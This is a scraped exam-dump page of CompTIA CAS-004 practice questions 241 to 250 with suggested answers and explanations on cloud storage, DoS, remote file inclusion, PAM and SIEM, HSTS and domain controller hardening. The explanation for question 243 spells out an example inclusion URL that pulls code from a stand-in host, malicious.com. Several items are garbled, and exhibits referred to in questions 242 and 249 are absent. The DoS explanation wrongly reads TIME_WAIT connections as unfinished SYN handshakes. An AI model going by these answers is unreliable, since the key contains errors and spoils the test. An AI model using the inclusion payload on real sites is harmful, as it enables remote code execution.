ExamGecko
Search Search Login
Home Home / CompTIA / CAS-004

CompTIA CAS-004 Practice Test - Questions Answers, Page 25

Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

An application server was recently upgraded to prefer TLS 1.3, and now users are unable to connect their clients to the server. Attempts to reproduce the error are confirmed, and clients are reporting the following: ERR_SSL_VERSION_OR_CIPHER_MISMATCH Which of the following is MOST likely the root cause?
Ransomware encrypted the entire human resources fileshare for a large financial institution. Security operations personnel were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last backup occurred 48 hours ago. The management team has indicated that the RPO for a disaster recovery event for this data classification is 24 hours. Based on RPO requirements, which of the following recommendations should the management team make?
Due to locality and budget constraints, an organization's satellite office has a lower bandwidth allocation than other offices in the organization. As a result, the local security infrastructure staff is assessing architectural options that will help preserve network bandwidth and increase speed to both internal and external resources while not sacrificing threat visibility. Which of the following would be the BEST option to implement?
An loT device implements an encryption module built within its SoC where the asymmetric private key has been defined in a write-once read-many portion of the SoC hardware Which of the following should the loT manufacture do if the private key is compromised?
A global organization's Chief Information Security Officer (CISO) has been asked to analyze the risks involved in a plan to move the organization's current MPLS-based WAN network to use commodity Internet and SD-WAN hardware. The SD-WAN provider is currently highly regarded but Is a regional provider. Which of the following is MOST likely identified as a potential risk by the CISO?
An organization is designing a network architecture that must meet the following requirements: Users will only be able to access predefined services. Each user will have a unique allow list defined for access. The system will construct one-to-one subject/object access paths dynamically. Which of the following architectural designs should the organization use to meet these requirements?
A security analyst is concerned that a malicious piece of code was downloaded on a Linux system. After some research, the analyst determines that the suspected piece of code is performing a lot of input/output (I/O) on the disk drive. Based on the output above, from which of the following process IDs can the analyst begin an investigation?
An internal security assessor identified large gaps in a company's IT asset inventory system during a monthly asset review. The assessor is aware of an external audit that is underway. In an effort to avoid external findings, the assessor chooses not to report the gaps in the inventory system. Which of the following legal considerations is the assessor directly violating?
in a situation where the cost of anti-malware exceeds the potential loss from a malware threat, which of the following is the most cost-effective risk response?
A security officer is requiring all personnel working on a special project to obtain a security clearance requisite with the level of all information being accessed Data on this network must be protected at the same level of each clearance holder The need to know must be vended by the data owner Which of the following should the security officer do to meet these requirements?

Question 241

Report
Export
Collapse

A company hosts a large amount of data in blob storage for its customers. The company recently had a number of issues with this data being prematurely deleted before the scheduled backup processes could be completed. The management team has asked the security architect for a recommendation that allows blobs to be deleted occasionally, but only after a successful backup. Which of the following solutions will BEST meet this requirement?

A.
Mirror the blobs at a local data center.
A.
Mirror the blobs at a local data center.
Answers
B.
Enable fast recovery on the storage account.
B.
Enable fast recovery on the storage account.
Answers
C.
Implement soft delete for blobs.
C.
Implement soft delete for blobs.
Answers
D.
Make the blob immutable.
D.
Make the blob immutable.
Answers
Suggested answer: C

Explanation:

Soft delete allows blobs to be deleted, but the data remains accessible for a period of time before it is permanently deleted. This allows the company to delete blobs as needed, while still affording enough time for the backup process to complete. After the backup process is complete, the blobs can be permanently deleted.

Question 242

Report
Export
Collapse

Users are claiming that a web server is not accessible. A security engineer logs for the site. The engineer connects to the server and runs netstat -an and receives the following output:

A.
Port scanning
A.
Port scanning
Answers
B.
ARP spoofing
B.
ARP spoofing
Answers
C.
Buffer overflow
C.
Buffer overflow
Answers
D.
Denial of service
D.
Denial of service
Answers
Suggested answer: D

Explanation:

A denial of service (DoS) attack is a malicious attempt to disrupt the normal functioning of a server by overwhelming it with requests or traffic1.One possible indicator of a DoS attack is a large number of connections from a single source IP address1.In this case, the output of netstat -an shows that there are many connections from 213.37.55.67 with different port numbers and in TIME WAIT state23.This suggests that the attacker is sending many SYN packets to initiate connections but not completing them, thus exhausting the server's resources and preventing legitimate users from accessing it1.

Question 243

Report
Export
Collapse

A security engineer notices the company website allows users following example:

hitps://mycompany.com/main.php?Country=US

Which of the following vulnerabilities would MOST likely affect this site?

A.
SQL injection
A.
SQL injection
Answers
B.
Remote file inclusion
B.
Remote file inclusion
Answers
C.
Directory traversal -
C.
Directory traversal -
Answers
D.
Unsecure references
D.
Unsecure references
Answers
Suggested answer: B

Explanation:

Remote file inclusion (RFI) is a web vulnerability that allows an attacker to include malicious external files that are later run by the website or web application12. This can lead to code execution, data theft, defacement, or other malicious actions.RFI typically occurs when a web application dynamically references external scripts using user-supplied input without proper validation or sanitization23.

In this case, the website allows users to specify a country parameter in the URL that is used to include a file from another domain. For example, an attacker could craft a URL like this:

https://mycompany.com/main.php?Country=https://malicious.com/evil.php

This would cause the website to include and execute the evil.php file from the malicious domain, which could contain any arbitrary code3.

Question 244

Report
Export
Collapse

city government's IT director was notified by the City council that the following cybersecurity requirements must be met to be awarded a large federal grant:

+ Logs for all critical devices must be retained for 365 days to enable monitoring and threat hunting.

+ All privileged user access must be tightly controlled and tracked to mitigate compromised accounts.

+ Ransomware threats and zero-day vulnerabilities must be quickly identified.

Which of the following technologies would BEST satisfy these requirements? (Select THREE).

A.
Endpoint protection
A.
Endpoint protection
Answers
B.
Log aggregator
B.
Log aggregator
Answers
C.
Zero trust network access
C.
Zero trust network access
Answers
D.
PAM
D.
PAM
Answers
E.
Cloud sandbox
E.
Cloud sandbox
Answers
F.
SIEM
F.
SIEM
Answers
G.
NGFW
G.
NGFW
Answers
Suggested answer: B, D, F

Explanation:

B) Log aggregator: A log aggregator is a tool that collects, parses, and stores logs from various sources, such as devices, applications, servers, etc.A log aggregator can help meet the requirement of retaining logs for 365 days by providing a centralized and scalable storage solution1.

D) PAM: PAM stands for privileged access management. It is a technology that controls and monitors the access of privileged users (such as administrators) to critical systems and data. PAM can help meet the requirement of controlling and tracking privileged user access by enforcing policies such as least privilege, multifactor authentication, password rotation, session recording, etc. .

F) SIEM: SIEM stands for security information and event management. It is a technology that analyzes and correlates logs from various sources to detect and respond to security incidents. SIEM can help meet the requirement of identifying ransomware threats and zero-day vulnerabilities by providing real-time alerts, threat intelligence feeds, incident response workflows, etc. .


Question 245

Report
Export
Collapse

A security architect is designing a solution for a new customer who requires significant security capabilities in its environment. The customer has provided the architect with the following set of requirements:

* Capable of early detection of advanced persistent threats.

* Must be transparent to users and cause no performance degradation.

+ Allow integration with production and development networks seamlessly.

+ Enable the security team to hunt and investigate live exploitation techniques.

Which of the following technologies BEST meets the customer's requirements for security capabilities?

A.
Threat Intelligence
A.
Threat Intelligence
Answers
B.
Deception software
B.
Deception software
Answers
C.
Centralized logging
C.
Centralized logging
Answers
D.
Sandbox detonation
D.
Sandbox detonation
Answers
Suggested answer: B

Explanation:

Deception software is a technology that creates realistic but fake assets (such as servers, applications, data, etc.) that mimic the real environment and lure attackers into interacting with them.By doing so, deception software can help detect advanced persistent threats (APTs) that may otherwise evade traditional security tools12.Deception software can also provide valuable insights into the attacker's tactics, techniques, and procedures (TTPs) by capturing their actions and behaviors on the decoys13.

Deception software can meet the customer's requirements for security capabilities because:

It is capable of early detection of APTs by creating attractive targets for them and alerting security teams when they are engaged12.

It is transparent to users and causes no performance degradation because it does not interfere with legitimate traffic or resources13.

It allows integration with production and development networks seamlessly because it can create decoys that match the network topology and configuration13.

It enables the security team to hunt and investigate live exploitation techniques because it can record and analyze the attacker's activities on the decoys13.

Question 246

Report
Export
Collapse

A software development company is building a new mobile application for its social media platform. The company wants to gain its users' trust by re reducing the risk of on-path attacks between the mobile client and its servers and

by implementing stronger digital trust. To support users' trust, the company has released the following internal guidelines:

* Mobile clients should verify the identity of all social media servers locally.

* Social media servers should improve TLS performance of their certificate status.

+ Social media servers should inform the client to only use HTTPS.

Given the above requirements, which of the following should the company implement? (Select TWO).

A.
Quick UDP internet connection
A.
Quick UDP internet connection
Answers
B.
OCSP stapling
B.
OCSP stapling
Answers
C.
Private CA
C.
Private CA
Answers
D.
DNSSEC
D.
DNSSEC
Answers
E.
CRL
E.
CRL
Answers
F.
HSTS
F.
HSTS
Answers
G.
Distributed object model
G.
Distributed object model
Answers
Suggested answer: B, F

Explanation:

OCSP stapling and HSTS are the best options to meet the requirements of reducing the risk of on-path attacks and implementing stronger digital trust. OCSP stapling allows the social media servers to improve TLS performance by sending a signed certificate status along with the certificate, eliminating the need for the client to contact the CA separately. HSTS allows the social media servers to inform the client to only use HTTPS and prevent downgrade attacks.The other options are either irrelevant or less effective for the given scenario.

Question 247

Report
Export
Collapse

During a phishing exercise, a few privileged users ranked high on the failure list. The enterprise would like to ensure that privileged users have an extra security-monitoring control in place. Which of the following Is the MOST

likely solution?

A.
A WAF to protect web traffic
A.
A WAF to protect web traffic
Answers
B.
User and entity behavior analytics
B.
User and entity behavior analytics
Answers
C.
Requirements to change the local password
C.
Requirements to change the local password
Answers
D.
A gap analysis
D.
A gap analysis
Answers
Suggested answer: B

Explanation:

User and entity behavior analytics (UEBA) is the best solution to monitor and detect unusual or malicious activity by privileged users who failed the phishing exercise. UEBA uses machine learning and behavioral analytics to establish a baseline of normal activity and identify anomalies that indicate potential threats. UEBA can help detect compromised credentials, insider threats, and advanced persistent threats that may evade traditional security solutions.The other options are either irrelevant or less effective for the given scenario.

Question 248

Report
Export
Collapse

Users are reporting intermittent access issues with & new cloud application that was recently added to the network. Upon investigation, he scary administrator notices the human resources department Is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application. Which of the following MOST likely needs to be done to avoid this in the future?

A.
Modify the ACLs.
A.
Modify the ACLs.
Answers
B.
Review the Active Directory.
B.
Review the Active Directory.
Answers
C.
Update the marketing department's browser.
C.
Update the marketing department's browser.
Answers
D.
Reconfigure the WAF.
D.
Reconfigure the WAF.
Answers
Suggested answer: A

Explanation:

Modifying the ACLs (access control lists) is the most likely solution to avoid the intermittent access issues with the new cloud application. ACLs are used to define permissions for different users and groups to access resources on a network. The problem may be caused by incorrect or missing ACLs for the marketing department that prevent them from accessing the cloud application or its data sources.The other options are either irrelevant or less effective for the given scenario

Question 249

Report
Export
Collapse

A security administrator has been tasked with hardening a domain controller against lateral movement attacks. Below is an output of running services:

Which of the following configuration changes must be made to complete this task?

A.
Stop the Print Spooler service and set the startup type to disabled.
A.
Stop the Print Spooler service and set the startup type to disabled.
Answers
B.
Stop the DNS Server service and set the startup type to disabled.
B.
Stop the DNS Server service and set the startup type to disabled.
Answers
C.
Stop the Active Directory Web Services service and set the startup type to disabled.
C.
Stop the Active Directory Web Services service and set the startup type to disabled.
Answers
D.
Stop Credential Manager service and leave the startup type to disabled.
D.
Stop Credential Manager service and leave the startup type to disabled.
Answers
Suggested answer: A

Explanation:

Stopping the Print Spooler service and setting the startup type to disabled is the best configuration change to harden a domain controller against lateral movement attacks. The Print Spooler service has been known to be vulnerable to remote code execution exploits that can allow attackers to gain access to domain controllers and other sensitive machines. Disabling this service can reduce the attack surface and prevent exploitation attempts.

Question 250

Report
Export
Collapse

An architectural firm is working with its security team to ensure that any draft images that are leaked to the public can be traced back to a specific external party. Which of the following would BEST accomplish this goal?

A.
Properly configure a secure file transfer system to ensure file integrity.
A.
Properly configure a secure file transfer system to ensure file integrity.
Answers
B.
Have the external parties sign non-disclosure agreements before sending any images.
B.
Have the external parties sign non-disclosure agreements before sending any images.
Answers
C.
Only share images with external parties that have worked with the firm previously.
C.
Only share images with external parties that have worked with the firm previously.
Answers
D.
Utilize watermarks in the images that are specific to each external party.
D.
Utilize watermarks in the images that are specific to each external party.
Answers
Suggested answer: D

Explanation:

Utilizing watermarks in the images that are specific to each external party would best accomplish the goal of tracing back any leaked draft images. Watermarks are visible or invisible marks that can be embedded in digital images to indicate ownership, authenticity, or origin. Watermarks can also be used to identify the recipient of the image and deter unauthorized copying or distribution. If a draft image is leaked to the public, the watermark can reveal which external party was responsible for the breach.

Total 510 questions
Go to page: of 51
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms